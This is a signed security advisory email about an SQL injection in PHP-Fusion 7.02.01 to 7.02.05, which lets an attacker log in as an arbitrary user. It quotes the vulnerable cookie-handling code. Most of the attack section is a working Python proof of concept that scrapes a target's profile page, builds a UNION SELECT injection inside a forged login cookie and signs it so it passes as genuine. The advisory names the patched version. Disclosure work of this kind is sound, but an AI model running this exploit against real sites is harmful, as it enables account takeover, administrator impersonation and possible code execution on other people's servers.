PHP-Fusion 7.02.05 SQL Injection
------enig2PSNXGBKMXPFWUGNIURDS
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
SQL Injection vulnerability exists in releases since 7.02.01 till 7.02.05=
of PHP-Fusion CMS. The vulnerability allows the attacker to authenticate=
as an arbitrary user and act with its rights which might lead to the cod=
e execution. Because of exploitation simplicity, the potential risk is ve=
ry high. Magic Quotes feature protects against this coding flaw. Version =
7.02.06 fixes presented security problem.
Affected file: includes/classes/Authenticate.class.php
023: define("COOKIE_USER", COOKIE_PREFIX."user");
024: define("COOKIE_ADMIN", COOKIE_PREFIX."admin");
147: $cookieDataArr =3D explode(".", $_COOKIE[COOKIE_USER]);
150: list($userID, $cookieExpiration, $cookieHash) =3D $cookieDataArr;
153: $result =3D dbquery(
154: "SELECT * FROM ".DB_USERS."
155: WHERE user_id=3D'".$userID."' AND user_status=3D'0' AND user_act=
iontime=3D'0'
156: LIMIT 1"
157: );
195: $cookieDataArr =3D explode(".", $_COOKIE[COOKIE_ADMIN]);
197: list($userID, $cookieExpiration, $cookieHash) =3D $cookieDataArr;
200: $result =3D dbquery(
201: "SELECT user_admin_algo, user_admin_salt FROM ".DB_USERS."
202: WHERE user_id=3D'".$userID."' AND user_level>101 AND user_statu=
s=3D'0' AND user_actiontime=3D'0'
203: LIMIT 1"
204: );
# Proof of Concept
# PHP-Fusion 7.02.05
# Authentication spoofing
# Author: vnd at vndh.net
from http import client
from time import time
import hashlib
import hmac
import re
def generateCookie(address, path, userid, password =3D 'admin'):
connection =3D client.HTTPConnection(address)
connection.request("GET", "%s/profile.php?lookup=3D%d" % (path, userid)=
)
response =3D connection.getresponse()
if response.status !=3D 200: raise BaseException("bad status")
cookies =3D response.getheader("Set-Cookie")
pattern =3D re.compile("([A-Z0-9\_]+)lastvisit", re.IGNORECASE)
cookiesearch =3D pattern.search(cookies)
if cookiesearch =3D=3D None: raise BaseException("bad cookie")
cookiename =3D cookiesearch.groups()
cookiename =3D "%suser" % cookiename[0]
source =3D response.read()
connection.close()
source =3D source.decode("utf-8")
pattern =3D re.compile("<!--profile_user_name-->(.*)<")
username =3D pattern.search(source).groups()
username =3D username[0]
injection =3D "-1' union select %d,'%s','sha256','','%s'%s,101%s -- " %=
(userid, username, password, ",0" * 15,",0" * 12)
expiration =3D str(int(time() + 86400))
userhash =3D ""
userhash =3D hmac.new(bytes(userhash.encode("utf-8")), bytes(("%s%s" % =
(injection, expiration)).encode("utf-8")), hashlib.sha256).hexdigest()
userhash =3D hmac.new(bytes(userhash.encode("utf-8")), bytes(("%s%s" % =
(injection, expiration)).encode("utf-8")), hashlib.sha256).hexdigest()
return (cookiename, ".".join([injection, expiration, userhash]))
Reference: https://vndh.net/note:php-fusion-70205-sql-injection
Patched version: http://www.php-fusion.co.uk/downloads.php?cat_id=3D23&do=
wnload_id=3D264
------enig2PSNXGBKMXPFWUGNIURDS
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: OpenPGP digital signature
Content-Disposition: attachment; filename="signature.asc"
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.17 (MingW32)
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
iQIcBAEBAgAGBQJRH55vAAoJEEJGP6nEM7Rc7GoP/1ZueGapK8dsmSHqo1qIM5ui
DxqEval92AWcT+r8P8QqLusiojjahidKDpG9BTsFwl98kDiFP1HEU8qG1oIR18T6
QE1hS0ru0D8YwbxRd/NmVVtUr4B2KWaZayFM8DWpVnEeX6YT0mLqQYYQbXgogxSF
40cCLGp9MpNzq6DoAGqbNiLA0pqUFmBzeoIr/VgZiik4KQGWFIEUHY5Q5vLXCiQ6
jcNbKdodQJFUF7tCohEz+tqXa1Bp5S8UljO4DeBT9zNvU2m/S98rW0sN7CYKRC/D
1rs5YTMXUyPYSq3RpIj+LtLYWM44spROU33X/CeBSnaAownBSB4K/JrjatZqyXqB
+euKW+kPkZwnGxg3fk5d2iotBJHXGOf91amqDnL90T0Wb9i/21lkWjQkx8x8RP90
oCTMXlRk9gbD9QhUmVWeqN5B5uYsqqXxbjxo+1Y/QF4EQnaCMdN1ayQZqu0u/m24
kHPGKc0AEG9k+n4H46GwM9T18eVlWl7cy/v89+ytkY59mP2HFPHn/m4CTMh8MO6T
w7MKsmwMEuAxVO2d5l9Xh8QIF1Ueo+LctM4sb5chAfNQaI8Iy3gBHzPxi1GZTrgk
wBn+qaPD0pHy/6F9ZEkdXJSRoya7Lv9JSePM5yWbMSFk1wfRyXcd3Ug8XxQSvyHO
YfxitY58uOgJwhGHdjmh
=0S02
-----END PGP SIGNATURE-----
------enig2PSNXGBKMXPFWUGNIURDS--